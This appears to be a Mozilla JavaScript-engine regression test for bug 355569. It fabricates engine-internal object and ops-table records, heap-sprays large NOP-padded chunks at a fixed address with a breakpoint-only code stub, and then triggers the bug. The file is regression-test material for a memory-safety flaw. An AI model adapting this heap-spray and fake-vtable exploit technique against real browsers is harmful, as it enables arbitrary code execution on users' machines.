/* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */

/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

/*
 * Regression test for bug 355569.
 *
 * The script fabricates a chain of records shaped like engine-internal
 * structures, fills memory with many copies of them, and then performs the
 * operation from the original bug report.  The test has no computed result:
 * `expect` and `actual` are both '' and the test passes as long as execution
 * reaches reportCompare() at the bottom without the engine crashing.  Every
 * exception raised inside exploit() is deliberately discarded (see the
 * try/catch below).
 *
 * printBugNumber, printStatus and reportCompare are not defined in this file;
 * they are presumably supplied by the shared test harness (shell.js).
 */

var bug = 355569;
var actual = '';
var expect = '';

printBugNumber (bug);
// NOTE(review): `summary` is not declared anywhere in this file and this call
// is outside the try/catch below, so it relies on the harness (or an earlier
// script) defining it — confirm before running the file standalone.
printStatus (summary);

// Base address used for every cross-reference inside the fabricated data.
var targetAddress = 0x12030010;
// Parameters consumed by sprayData() below.  Sizes are in bytes; sprayData
// divides by 2 because each JS string character occupies 16 bits.
var sprayParams = {
  chunkSize: 16 * 1024 * 1024,   // target byte length of each chunk
  chunkCount: 16,                // number of chunks stored in the rooter
  chunkMarker: 0xdeadface,       // 32-bit value packed in front of every chunk
  chunkAlign: 0x1000,            // the data is padded with "\u9090" up to this many bytes
  reservedSize: 1024             // bytes left out of chunkSize
};

// Returns the fixed 6-character (12-byte) payload that makeExploitData()
// appends under the key "exploit-code".  The instruction listing in the
// comment is the original author's description of the bytes.  The function
// takes no parameters; the `ctx` argument passed by makeExploitData() is
// ignored.
function makeExploitCode() {
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
}

/*==========================================================================*/
/*==========================================================================*/

/*
 * Serialise the values in A into a string according to `template`, one
 * template character per value:
 *   's' / 'S'  -> one 16-bit character holding the low 16 bits of the value;
 *   'l' / 'L'  -> two characters: low 16 bits first, then the high 16 bits
 *                 (the author's "XXX endian" marks this byte order as a
 *                 platform assumption);
 *   '='        -> the value converted with String(), no width constraint.
 * Any other template character (spaces are used as visual separators) is
 * skipped and consumes no value.  Numeric values are coerced to unsigned
 * 32-bit with `>>> 0` before packing.  `A` may be an Array or an `arguments`
 * object — only indexed access is used.  Returns the packed string.
 */
function packData(template, A) {
  var n = 0, result = "", vl;
  for(var i = 0; i < template.length; i++) {
    var ch = template.charAt(i);
    if(ch == "s" || ch == "S") {
      vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
    } else if(ch == "l" || ch == "L") { // XXX endian
      // `vl >> 16` may be negative for values with the top bit set;
      // String.fromCharCode truncates it to 16 bits, so the high half is
      // still packed correctly.
      vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
    } else if(ch == "=") {
      result += String(A[n++]);
    }
  }
  return result;
}
/*
 * Build a string out of named, cross-referencing pieces.
 *
 * `worker(ctx)` appends pieces with ctx.append(key, str) and looks up the
 * absolute address of a piece with ctx.address(key) = address + byte offset
 * of that key (offsets are result.length * 2 because each character is two
 * bytes).  An unknown or falsy key resolves to the base `address`
 * (offset 0).
 *
 * The worker is run twice: on the first pass forward references resolve to
 * the base address because their offsets are not yet known; the result is
 * then discarded and the worker is run again with every offset recorded, so
 * the second result has all references filled in.  This only yields
 * consistent offsets when each piece has the same length on both passes,
 * which holds for the fixed-width templates used in this file.  Returns the
 * second-pass string.
 */
function buildStructure(worker, address) {
  var offs = {}, result = "", context = {
    append: function(k, v) { offs[k] = result.length * 2; result += v; },
    address: function(k) { return address + ((k && offs[k]) || 0); }
  }; worker(context); result = ""; worker(context); return result;
}
/*
 * Return a string of exactly L characters made of repeated copies of `s`:
 * truncated if L <= s.length (a non-positive L yields ""), otherwise `s` is
 * doubled until it exceeds L/2 and the remainder is filled with a prefix of
 * `s`.
 */
function repeatToLength(s, L) {
  if(L <= s.length) { return s.substring(0, L); }
  while(s.length <= L/2) { s += s; }
  return s + s.substring(0, L - s.length);
}
/*
 * Store params.chunkCount strings of roughly params.chunkSize bytes in
 * `rooter`, each consisting of the packed chunkMarker followed by `data`
 * padded with "\u9090" to chunkAlign bytes and tiled to
 * (chunkSize - reservedSize) bytes.  Lengths are divided by 2 to convert
 * bytes to 16-bit characters.  The loop index is appended to every string
 * so the copies are distinct; `rooter` is presumably an object kept
 * reachable so the strings are not garbage-collected (see exploit()).
 * Nothing is returned; the effect is the assignments into `rooter`.
 */
function sprayData(data, params, rooter) {
  var marker = packData("L", [ params.chunkMarker ]);
  data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
  data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
  for(var i = 0; i < params.chunkCount; i++) {
    rooter[i] = marker + data + i;
  }
}

/*
 * T_* helpers: each packs its arguments with packData() using a fixed
 * template, so the parameter list documents the field order and the
 * template documents the field widths (L = 32 bits, S = 16 bits).  The
 * names mirror engine structures as they presumably were at the time of the
 * bug; the layouts are not verified here.
 */
function T_JSObject(map, slots)
{ return packData("LL", arguments); }
function T_JSObjectMap(nrefs, ops, nslots, freeslot)
{ return packData("LLLL", arguments); }
// 24 32-bit fields; the spaces in the template are separators only.
function T_JSObjectOps(
  newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
  getProperty, setProperty, getAttributes, setAttributes,
  deleteProperty, defaultValue, enumerate, checkAccess,
  thisObject, dropProperty, call, construct,
  xdrObject, hasInstance, setProto, setParent,
  mark, clear, getRequiredSlot, setRequiredSlot
) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }

// 12 fields: four 32-bit, two 16-bit (xml_class, xml_flags), then six 32-bit.
function T_JSXML_LIST(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  xml_target, xml_targetprop
) { return packData("LLLLSS LLLL LL", arguments); }
// 18 fields: same header as T_JSXML_LIST, then three 4-field groups.
function T_JSXML_ELEMENT(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  nses_length, nses_capacity, nses_vector, nses_cursors,
  atrs_length, atrs_capacity, atrs_vector, atrs_cursors
) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }

/*==========================================================================*/
/*==========================================================================*/

/*
 * Assemble the fabricated records, laid out consecutively starting at
 * `address`, with each record pointing at the next via ctx.address():
 * xml-list -> xml-kids-vector -> xml-element -> object -> object-map ->
 * object-ops -> exploit-code.  Relies on buildStructure()'s two-pass scheme
 * so that references to pieces appended later still resolve.  Returns the
 * packed string.
 */
function makeExploitData(address) {
  return buildStructure(function(ctx) {
    ctx.append("xml-list",
      T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
    ctx.append("xml-kids-vector",
      packData("L", [ ctx.address("xml-element") ]));
    ctx.append("xml-element",
      T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
    ctx.append("object",
      T_JSObject(ctx.address("object-map"), 0));
    ctx.append("object-map",
      T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
    ctx.append("object-ops",
      T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
    // makeExploitCode() ignores the ctx argument.
    ctx.append("exploit-code",
      makeExploitCode(ctx));
  }, address);
}

/*
 * Run the test body: fill memory with the fabricated data, then perform the
 * operation from the bug report.  `this.rooter = {}` stores the spray target
 * on `this` (the global object when called as a plain function in sloppy
 * mode), presumably so the chunks stay reachable for the rest of the run.
 * `numobj` is intentionally unused — constructing it is the trigger.
 */
function exploit() {
  sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
  var numobj = new Number(targetAddress >> 1);
  printStatus("probably not exploitable");
}

// Any exception from exploit() is swallowed on purpose: the only failure
// mode this test checks for is the engine not surviving to reportCompare().
try
{
  exploit();
}
catch(ex)
{
}

// expect and actual are both '' — reaching this line is the pass condition.
reportCompare(expect, actual);